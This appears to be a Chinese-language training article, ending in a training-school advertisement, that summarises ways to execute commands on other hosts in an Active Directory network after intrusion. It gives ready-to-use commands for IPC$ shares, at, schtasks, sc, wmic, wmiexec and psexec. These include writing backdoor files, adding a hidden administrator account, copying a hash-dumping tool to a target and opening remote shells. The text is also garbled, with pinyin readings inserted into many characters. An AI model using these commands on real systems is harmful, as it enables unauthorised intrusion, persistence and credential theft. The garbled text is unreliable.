AD的全稱是Active Directory：活動目錄

　　域(Domain)是Windows網(wǎng)絡(luò)中獨(dú)立運(yùn)行的單位，域之間相互訪問則需要建立信任關(guān)系(即Trust Relation)。信任關(guān)系是連接在域與域之間的橋梁。當(dāng)一個域與其他域建立了信任關(guān)系后兩個域之間不但可以按需要相互進(jìn)行管理，還可以跨網(wǎng)分配文件和打印機(jī)等設(shè)備資源，使不同的域之間實(shí)現(xiàn)網(wǎng)絡(luò)資源的共享與管理，以及相互通信和數(shù)據(jù)傳輸。

　　在域滲透場景中，我們已經(jīng)進(jìn)入內(nèi)網(wǎng)，會遇到大量的開放端口和服務(wù)，弱密碼空密碼，這個時候我們可以使用它們已經(jīng)開啟的服務(wù)選擇對應(yīng)的方式進(jìn)行命令執(zhí)行。本文對ad域滲透中常見的命令執(zhí)行方式進(jìn)行一個總結(jié)。

　　ipc

　　前提

　　開啟ipc共享

　　配置本地安全策略：開始->運(yùn)行-> secpol.msc->本地策略->安全選項->網(wǎng)絡(luò)訪問：共享>和本地帳戶的安全模型>經(jīng)典-本地用戶進(jìn)行身份驗證

　　配置本地組策略：運(yùn)行g(shù)pedit.msc ——計算機(jī)配置——Windows設(shè)置——安全設(shè)置——本地策略 ——安全選項——用戶賬戶控制：以管理員批準(zhǔn)模式運(yùn)行所有管理員——禁用。

　　文件共享

　　寫入后門文件

　　net use z: \\目標(biāo)IP\c$ "passwd" /user:"admin"

　　或

　　copy hack.bat \\目標(biāo)ip\c$

　　#刪除連接

　　net use \\目標(biāo)IP\ipc$ /del

　　后續(xù)使用下面的方式執(zhí)行

　　at(win10不可用)

　　定時任務(wù)執(zhí)行命令

　　前提

　　開啟windows Event log服務(wù)，開啟Task Scheduler服務(wù)

　　其余條件同ipc

　　命令執(zhí)行

　　at \\170.170.64.19 23:00 c:\windows\system32\calc.exe

　　at \\170.170.64.19 1 delete /yes #刪除本機(jī)1號任務(wù)

　　schtasks

　　前提

　　開啟windows Event log服務(wù)，開啟Task Scheduler服務(wù)

　　其余條件同ipc

　　schtasks /create /tn firstTask /tr "c:\windows\system32\cmd.exe /c calc" /sc once /st 00:00 /S 170.170.64.19 /RU System /u admin /p passwd

　　schtasks /run /tn firstTask /S 170.170.64.19 /u admin /p passwd

　　schtasks /F /delete /tn firstTask /S 170.170.64.19 /u admin /p passwd

　　telnet

　　前提

　　開啟telnet服務(wù)

　　命令執(zhí)行

　　telnet 目標(biāo)ip

　　之后可執(zhí)行命令

　　sc

　　windows2003

　　windows XP

　　命令執(zhí)行

　　sc \\170.170.64.19 create testSC binPath= "cmd.exe /c start c:\windows\hack.bat"

　　sc \\170.170.64.19 start testSC

　　sc \\170.170.64.19 delete testSC

　　wmic

　　前提

　　開啟wmi服務(wù)，135端口

　　命令執(zhí)行

　　wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c calc.exe"

　　wmic /node:170.170.64.19 /user:admin /password:passwd process call create "cmd.exe /c net user test 123456 /add && net localgroup administrators test /add"

　　wmiexec.vbs(需要安裝)

　　前提

　　開啟wmi服務(wù)，135端口

　　安裝

　　下載vmiexec.vbs

　　命令執(zhí)行

　　cscript.exe //nologo wmiexec.vbs /shell 170.170.64.19 admin passwd

　　cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd "cmdkey /list"

　　cscript.exe wmiexec.vbs /cmd 170.170.64.19 admin passwd c:\programdata\test.bat

　　#其他參數(shù)

　　-wait5000 表示這個命令等待5s后再讀取結(jié)果，用于運(yùn)行“運(yùn)行時間長”的命令。

　　-persist 程序會在后臺運(yùn)行，不會有結(jié)果輸出，而且會返回這個命令進(jìn)程的 PID，方便結(jié)束進(jìn)程，用于運(yùn)行 nc 或者木馬程序。

　　impackets wmiexec(需要安裝)

　　前提

　　開啟wmi服務(wù)，135端口

　　安裝

　　git clone https://github.com/SecureAuthCorp/impacket/

　　pip install -r requirements.txt

　　pip install impacket

　　命令執(zhí)行

　　#獲取遠(yuǎn)程計算機(jī)交互式shell

　　python wmiexec.py admin:passwd@170.170.64.19

　　psexec(需要安裝)

　　前提

　　開啟admin$共享

　　安裝

　　在 https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

　　下載安裝

　　命令執(zhí)行

　　#打開交互式shell

　　psexec \\170.170.64.19 -u admin -p passwd cmd

　　#執(zhí)行單條命令

　　psexec \\170.170.64.19 -u admin -p passwd -s cmd /c "calc.exe"

　　#拷貝文件到遠(yuǎn)程計算機(jī)并執(zhí)行

　　psexec \\170.170.64.19 -u admin -p passwd -c C:\Users\Administrator\Desktop\GetHashes.exe

　　#其他參數(shù)

　　–accepteula 第一次運(yùn)行會彈框,輸入這個參數(shù)便不會彈框

　　-s 以 “nt authority\system” 權(quán)限運(yùn)行遠(yuǎn)程進(jìn)程

　　-h 如果可以，以管理員權(quán)限運(yùn)行遠(yuǎn)程進(jìn)程

　　-d 不等待程序執(zhí)行完就返回，請只對非交互式應(yīng)用程序使用此選項

　　\\ip 可以替換成 @ip.txt (存放多個 ip 的文本)，可以批量執(zhí)行命令

　　遠(yuǎn)程桌面

　　前提

　　開啟遠(yuǎn)程桌面，3389端口

　　命令執(zhí)行

　　可直接通過mstsc進(jìn)入目標(biāo)系統(tǒng)。

　　更多關(guān)于"IT網(wǎng)絡(luò)安全培訓(xùn)"的問題，歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓(xùn)服務(wù)經(jīng)驗，采用全程面授高品質(zhì)、高體驗培養(yǎng)模式，擁有國內(nèi)一體化教學(xué)管理及學(xué)員服務(wù)，助力更多學(xué)員實(shí)現(xiàn)高薪夢想。